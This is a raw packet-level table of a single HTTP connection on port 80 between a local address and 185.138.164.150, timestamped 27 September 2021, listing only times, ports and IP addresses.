Sep 27, 2021 23:55:31.353945971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.353965998 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.354012966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.354130983 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.388744116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388792038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388820887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388848066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388870955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388897896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388922930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.388947964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.389082909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.389112949 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.389157057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.389182091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.389208078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.389271975 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.389379978 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.424654007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424746990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424777031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424803019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424843073 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424868107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424917936 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.424938917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.424952984 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.424964905 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.424968958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.425014019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.425039053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.425074100 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.425115108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.426284075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.426342010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.426419973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.459661961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459700108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459798098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459816933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459835052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459857941 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459880114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459901094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459898949 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.459919930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.459938049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.460047007 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.460071087 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.460974932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.461003065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.461188078 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.494560003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494585991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494604111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494790077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494807005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494807959 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.494820118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494837046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494879961 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.494887114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.494971991 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.495246887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.495265007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.495337963 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.495477915 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.495511055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.495629072 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.529879093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.529954910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.529973030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.529990911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530008078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530025959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530045033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530092955 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.530134916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530174017 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.530227900 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.530270100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530287981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530317068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530356884 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.530364990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530421972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530426979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.530440092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.530505896 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.566903114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.566948891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.566962957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.566982031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.566996098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567014933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567173004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567193031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567213058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567256927 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.567325115 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.567466021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567487955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567513943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567533970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567548990 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.567549944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.567611933 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.603092909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603197098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603216887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603238106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603401899 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.603594065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603620052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603714943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.603796959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603815079 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603837013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603857040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603861094 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.603895903 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.603900909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603934050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.603972912 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.603977919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.604017019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.604057074 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.638377905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638411999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638427973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638444901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638478041 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.638500929 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.638609886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638637066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638680935 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.638813972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.638952017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639010906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639015913 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.639040947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639082909 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.639086008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639142990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639159918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639192104 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.639234066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.639280081 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.673880100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.673908949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.673928976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.673947096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.673998117 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674021959 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674084902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674103022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674146891 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674287081 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674408913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674458027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674463987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674484015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674525023 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674566031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674585104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674602032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674633026 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674792051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674844980 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.674882889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674920082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.674961090 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.708710909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.708743095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.708760977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.708775997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.708792925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.708807945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.708914042 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.708972931 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.709777117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.709820032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.709840059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.709898949 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.709924936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.709942102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.709975958 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.710021973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.710078001 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.710088968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.710105896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.710158110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.710191965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.710208893 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.710273027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.743659019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.743684053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.743700027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.743716002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.743808031 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.743901968 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.744522095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744697094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744715929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744733095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744754076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744770050 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.744801998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744818926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744826078 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.744924068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.744956017 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.744993925 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.744999886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.745017052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.745033026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.745049000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.745076895 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.745130062 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.779023886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.779053926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.779143095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.779263973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.780513048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780555964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780580044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780601025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780622959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780632973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.780643940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780663967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780683994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780704975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780708075 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.780730009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780752897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780772924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780793905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.780832052 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.780878067 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.816457987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816490889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816519022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816536903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816555023 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816571951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816590071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816611052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816649914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816668034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816695929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816745996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816764116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816780090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816804886 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.816827059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816917896 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.816955090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.816972017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.817066908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.853857994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.853889942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.853909016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854001045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854079008 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854160070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854178905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854195118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854213953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854217052 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854245901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854293108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854299068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854341030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854348898 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854357958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854382992 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854406118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854430914 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854435921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854451895 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854494095 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.854506969 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854522943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.854573011 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.879740953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.880141020 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.890209913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890249968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890256882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890266895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890415907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890434980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890450001 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.890502930 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.890836000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.890997887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.891064882 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.891690969 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.891874075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.891943932 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.915138960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.915168047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.915354013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.925059080 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.925210953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.925244093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.925281048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.925324917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.925348043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.925405979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.925465107 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.926472902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.926541090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.926561117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.926657915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.926738024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.926817894 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.951153040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.951273918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.951452971 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.960660934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.960715055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.960752010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.960784912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.960815907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.960875034 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.960948944 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.960947990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.961013079 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:31.962338924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:31.962384939 CEST	80	49745	185.138.164.150	192.168.2.3
